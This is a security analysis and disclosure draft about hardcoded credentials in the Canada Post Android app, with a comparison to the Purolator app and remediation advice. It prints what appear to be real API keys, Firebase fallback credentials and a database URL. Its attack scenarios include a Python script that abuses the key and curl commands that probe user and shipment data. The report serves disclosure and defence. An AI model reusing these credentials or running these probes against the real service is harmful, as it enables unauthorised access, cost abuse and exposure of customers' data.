# CANADA POST (CPC) APP - HARDCODED CREDENTIALS ANALYSIS **Analysis Date:** November 10, 2025 **App Package:** ca.canadapost.android **Comparison:** Similar to Purolator DeliveryPro app --- ## EXECUTIVE SUMMARY ✅ **YES - The Canada Post app DOES contain hardcoded credentials**, specifically: 1. **Google Maps API Key** (hardcoded) 2. **Firebase Remote Config with fallback credentials** (APP_CHECK_FAILED_ID/KEY) 3. **Firebase Database URL** exposed 4. Similar architectural vulnerabilities to the Purolator app --- ## 🔴 CRITICAL FINDING #1: HARDCODED GOOGLE API KEY ### Location **File:** `cpc/ca/canadapost/core/data/addresscomplete/IGooglePlaceApi.java` **Line:** 28 ### The Credential ```java if ((i10 & 8) != 0) { str4 = "AIzaSyA6pUGegwhkDQizhmqPt6VZhFfYdHx8hmw"; } return iGooglePlaceApi.findPlace(str, str5, str6, str4, dVar); ``` ### API Details - **Service:** Google Places API (Find Place from Text) - **Endpoint:** `/maps/api/place/findplacefromtext/json` - **Key Type:** Google Cloud API Key - **Purpose:** Address autocomplete/lookup in the app ### Security Impact 🔴 **CRITICAL - Unrestricted API Key Abuse** **Attacker Actions:** 1. **Extract the key** from decompiled APK (as shown above) 2. **Use it for unlimited Google Places API calls** - if not restricted 3. **Cost the organization money** through excessive API usage 4. **Bypass intended rate limits** for the service **Cost Impact:** - Google Places API: $17 per 1,000 requests (Find Place from Text) - An attacker could potentially rack up **$100s to $1000s in charges** - If key has no daily quota limits, costs could be catastrophic --- ## 🟠 CRITICAL FINDING #2: FIREBASE REMOTE CONFIG EXPLOITATION ### Discovery From your Firebase analysis, the app connects to: ``` https://firebaseremoteconfig.googleapis.com/v1/projects/741680414261/namespaces/firebase:fetch?key=AIzaSyDWtJr2knyZpJEOgBlJH_lBk-xqlnQJ27Q ``` ### Exposed in Remote Config ```json { "APP_CHECK_FAILED_ID": "cpc-appcheck-android", "APP_CHECK_FAILED_KEY": "1mhxwdN1Y5afLQgYeEgZ", "FIREBASE_APP_CHECK": "true", "AWS_PUSH_V2": "true" } ``` ### Implementation Code **File:** `cpc/f9/a.java` (AppCheckInterceptor) **Lines:** 720-721, 758-759, 775-776, 788-789 ```java c10 = this.f17954a.c(p9.a.APP_CHECK_FAILED_ID); String c11 = this.f17954a.c(p9.a.APP_CHECK_FAILED_KEY); ``` ### What This Means The app uses **Firebase App Check** as a security control, BUT: 1. **Fallback credentials are exposed** in public Remote Config 2. When App Check fails, app uses these hardcoded fallback values 3. Attacker can extract these credentials and **bypass App Check** 4. Grants access to backend APIs that should be protected ### Attack Vector ``` 1. App Check validation fails (or attacker forces failure) 2. App retrieves: APP_CHECK_FAILED_ID="cpc-appcheck-android" APP_CHECK_FAILED_KEY="1mhxwdN1Y5afLQgYeEgZ" 3. App generates JWT token using fallback credentials 4. Attacker intercepts this flow and replicates it 5. Attacker can now authenticate to protected APIs ``` --- ## 🟠 FINDING #3: FIREBASE DATABASE EXPOSED ### Database URL ``` https://canada-post-2dce9.firebaseio.com ``` ### Configuration **File:** `cpc/com/google/firebase/FirebaseOptions.java` The Firebase database URL is embedded in the app configuration. Combined with the API key and fallback credentials, an attacker may be able to: 1. **Query Firebase Realtime Database** (if rules allow) 2. **Access user data** stored in Firebase 3. **Enumerate data structures** and API patterns 4. **Bypass intended security rules** using fallback auth --- ## 📊 COMPARISON TO PUROLATOR APP | Feature | Purolator DeliveryPro | Canada Post CPC | |---------|----------------------|-----------------| | **Hardcoded API Keys** | ✅ AWS API key exposed | ✅ Google Maps API key exposed | | **Firebase Config** | ✅ Encryption keys in Remote Config | ✅ Fallback auth credentials exposed | | **Database URL** | ✅ Firebase database exposed | ✅ Firebase database exposed | | **Authentication Bypass** | ✅ App Check can be circumvented | ✅ App Check fallback credentials public | | **Severity** | 🔴 CRITICAL | 🔴 CRITICAL | **Conclusion:** Both apps have **similar architectural security flaws**. --- ## 🎯 FIREBASE REMOTE CONFIG - ATTACKER ABUSE SCENARIOS ### What Firebase Remote Config Is Firebase Remote Config allows apps to: - **Fetch feature flags** from Google's servers - **Update app behavior** without releasing new versions - **A/B test features** and roll out changes gradually ### The Security Problem The Canada Post app's Remote Config is **publicly accessible**: ```bash curl "https://firebaseremoteconfig.googleapis.com/v1/projects/741680414261/namespaces/firebase:fetch?key=AIzaSyDWtJr2knyZpJEOgBlJH_lBk-xqlnQJ27Q" ``` **Returns sensitive configuration including:** ```json { "APP_CHECK_FAILED_ID": "cpc-appcheck-android", "APP_CHECK_FAILED_KEY": "1mhxwdN1Y5afLQgYeEgZ", "ATTENTION_MESSAGE": {...}, "CHE_CAROUSEL_BANNERS": [{...}], "MAINTENANCE_PAGE": {...}, "REQUIRED_APP_VERSION": "18.0.0" } ``` --- ## 🚨 ATTACKER EXPLOITATION SCENARIOS ### Scenario 1: Google API Key Abuse ```python import requests # Stolen API key GOOGLE_API_KEY = "AIzaSyA6pUGegwhkDQizhmqPt6VZhFfYdHx8hmw" # Abuse the Places API url = "https://maps.googleapis.com/maps/api/place/findplacefromtext/json" params = { "input": "123 Main St Toronto", "inputtype": "textquery", "fields": "formatted_address,name,geometry", "key": GOOGLE_API_KEY } response = requests.get(url, params=params) print(response.json()) # Works if key not restricted! # Attacker can now: # - Perform unlimited geocoding lookups # - Cost Canada Post money for each request # - Use for their own apps/services # - Potentially exhaust daily quota, DoS'ing the real app ``` **Cost Impact:** - 100,000 requests/day = $1,700/day = **$51,000/month** - If unrestricted: attackers could drain budget rapidly --- ### Scenario 2: Firebase App Check Bypass ```python import requests import base64 import json # Public fallback credentials from Remote Config APP_CHECK_ID = "cpc-appcheck-android" APP_CHECK_KEY = "1mhxwdN1Y5afLQgYeEgZ" # Attacker flow: # 1. Trigger App Check failure (e.g., use rooted device, modified APK) # 2. App falls back to these credentials # 3. App generates JWT token using OAuth with these credentials # 4. Attacker replicates this process # Pseudo-code for attack: def bypass_app_check(): # Use fallback credentials to authenticate oauth_response = authenticate_with_fallback(APP_CHECK_ID, APP_CHECK_KEY) jwt_token = oauth_response['id_token'] # Now access protected APIs with token protected_api_call(jwt_token) # Result: Attacker bypasses App Check and accesses backend APIs ``` --- ### Scenario 3: Feature Flag Manipulation ```json // Attacker monitors Remote Config { "REQUIRED_APP_VERSION": "18.0.0", "MAINTENANCE_PAGE": { "showAttentionMessage": false }, "FIREBASE_APP_CHECK": "true" } // Attacker learns: // - Minimum app version to emulate // - When maintenance windows occur // - Which security features are enabled // - How to craft convincing requests ``` **Attack Actions:** 1. **Version spoofing**: Use REQUIRED_APP_VERSION to bypass checks 2. **Timing attacks**: Wait for maintenance windows when security is relaxed 3. **Feature discovery**: Learn what APIs/features exist 4. **Social engineering**: Craft phishing based on real banner messages --- ### Scenario 4: Firebase Database Enumeration ```bash # Known database URL DATABASE_URL="https://canada-post-2dce9.firebaseio.com" # Try common endpoints curl "$DATABASE_URL/users.json?auth=" curl "$DATABASE_URL/tracking.json?auth=" curl "$DATABASE_URL/shipments.json?auth=" # If security rules are misconfigured: # - Read user data # - Enumerate tracking numbers # - Access shipment information # - Discover API structure ``` --- ## 🛡️ WHY THIS IS DANGEROUS ### 1. **Economic Impact** - **API Cost Abuse**: Unlimited use of paid Google APIs - **Budget Exhaustion**: Attackers can intentionally drain quota/budget - **Service Disruption**: DoS through quota exhaustion ### 2. **Security Bypass** - **App Check circumvention**: Fallback credentials defeat the security control - **Authentication bypass**: Can access APIs without proper device attestation - **Rate limit evasion**: Bypass intended usage limits ### 3. **Privacy & Data Access** - **Firebase data exposure**: If rules misconfigured, can read user data - **Tracking data**: Potential access to shipment/tracking information - **User enumeration**: Discover valid accounts and addresses ### 4. **Reputation Damage** - **Public disclosure**: Security researchers or malicious actors can publish findings - **Loss of trust**: Customers lose confidence in app security - **Regulatory issues**: Potential GDPR/privacy violations if data accessed --- ## 🔧 RECOMMENDATIONS (FOR CANADA POST) ### Immediate Actions (24-48 hours) 1. **Rotate Google API Key** - Generate new Google Maps API key - Apply IP/bundle restrictions - Revoke the exposed key: `AIzaSyA6pUGegwhkDQizhmqPt6VZhFfYdHx8hmw` 2. **Restrict API Keys** ``` Restrictions to apply: - Application restrictions: Android apps (ca.canadapost.android) - API restrictions: Only enable required APIs - Quotas: Set daily limits - Usage monitoring: Enable alerts ``` 3. **Move Fallback Credentials Server-Side** - Remove `APP_CHECK_FAILED_ID` and `APP_CHECK_FAILED_KEY` from Remote Config - Store them server-side only - Implement proper server-side App Check validation 4. **Review Firebase Security Rules** ```javascript // Example: Ensure database is locked down { "rules": { ".read": "auth != null", ".write": "auth != null" } } ``` ### Architectural Changes (1-2 weeks) 1. **Implement Server-Side API Proxy** ``` [Mobile App] -> [Canada Post Backend] -> [Google APIs] -> [Firebase] -> [Protected Resources] - App never contains API keys - Backend validates requests - Backend makes external API calls ``` 2. **Enhance App Check Implementation** - Remove fallback credentials entirely - Fail secure (deny access if App Check fails) - Implement server-side App Check verification 3. **Use Environment-Specific Keys** - Development keys for debug builds - Production keys with strict quotas - Separate keys per environment 4. **Secret Management** - Never hardcode keys in source code - Use build-time injection (gradle properties) - Consider using Android's encrypted secrets ### Long-Term Strategy 1. **Security Audit** - Full code review for hardcoded credentials - Penetration testing of mobile app - Firebase security rules audit 2. **Secure Development Training** - Train developers on mobile security best practices - Implement code review processes - Add automated security scanning (SAST/DAST) 3. **Monitoring & Alerting** - Monitor API usage for anomalies - Alert on quota exhaustion - Track failed App Check validations --- ## 📋 DISCLOSURE NOTES ### Responsible Disclosure If reporting this to Canada Post: 1. **Subject Line**: "Security Advisory: Hardcoded Credentials in Canada Post Mobile App" 2. **Severity**: Critical (CVSS 8.0+) 3. **Affected Versions**: Likely all versions in production 4. **Proof of Concept**: Extractable from decompiled APK 5. **Suggested Timeline**: 90-day disclosure window ### Evidence Package Include: - This analysis document - Decompiled source files showing hardcoded keys - cURL commands demonstrating Remote Config access - Screenshots of Firebase Remote Config response - Example attack scenarios ### CWE Classifications - **CWE-798**: Use of Hard-coded Credentials - **CWE-522**: Insufficiently Protected Credentials - **CWE-311**: Missing Encryption of Sensitive Data - **CWE-200**: Exposure of Sensitive Information --- ## 🎓 EDUCATIONAL TAKEAWAY ### For Developers **Never hardcode credentials in mobile apps.** Period. Mobile apps are: - ✅ Easily decompiled - ✅ Run in untrusted environments - ✅ Distributed to millions of users - ✅ Impossible to "patch" retroactively (old versions exist forever) ### Best Practice ``` ❌ BAD: String API_KEY = "AIzaSy..."; ✅ GOOD: String apiKey = fetchFromSecureBackend(); ❌ BAD: Credentials in Firebase Remote Config (public) ✅ GOOD: Credentials server-side only ❌ BAD: Fallback to public credentials when security fails ✅ GOOD: Fail secure - deny access if attestation fails ``` --- ## 🔗 COMPARISON SUMMARY **Both Purolator and Canada Post apps suffer from the SAME vulnerability class:** 1. **Hardcoded API credentials** in decompilable code 2. **Firebase Remote Config** exposing sensitive configuration 3. **Insufficient key protection** mechanisms 4. **Bypassable security controls** (App Check fallbacks) This suggests a **systemic issue** - potentially: - Same development team - Shared architecture/template - Common third-party SDK misuse - Industry-wide mobile security gap --- ## CONCLUSION **The Canada Post mobile app contains hardcoded credentials similar to Purolator's app.** **Key Findings:** - 🔴 Google Maps API key hardcoded: `AIzaSyA6pUGegwhkDQizhmqPt6VZhFfYdHx8hmw` - 🔴 Firebase App Check fallback credentials publicly exposed - 🔴 Firebase database URL discoverable - 🔴 Remote Config accessible without authentication **Risk Level:** CRITICAL **Exploitability:** HIGH (trivial to extract and abuse) **Business Impact:** HIGH (cost, reputation, data privacy) **Recommendation:** Immediate remediation required. --- *Analysis completed: November 10, 2025*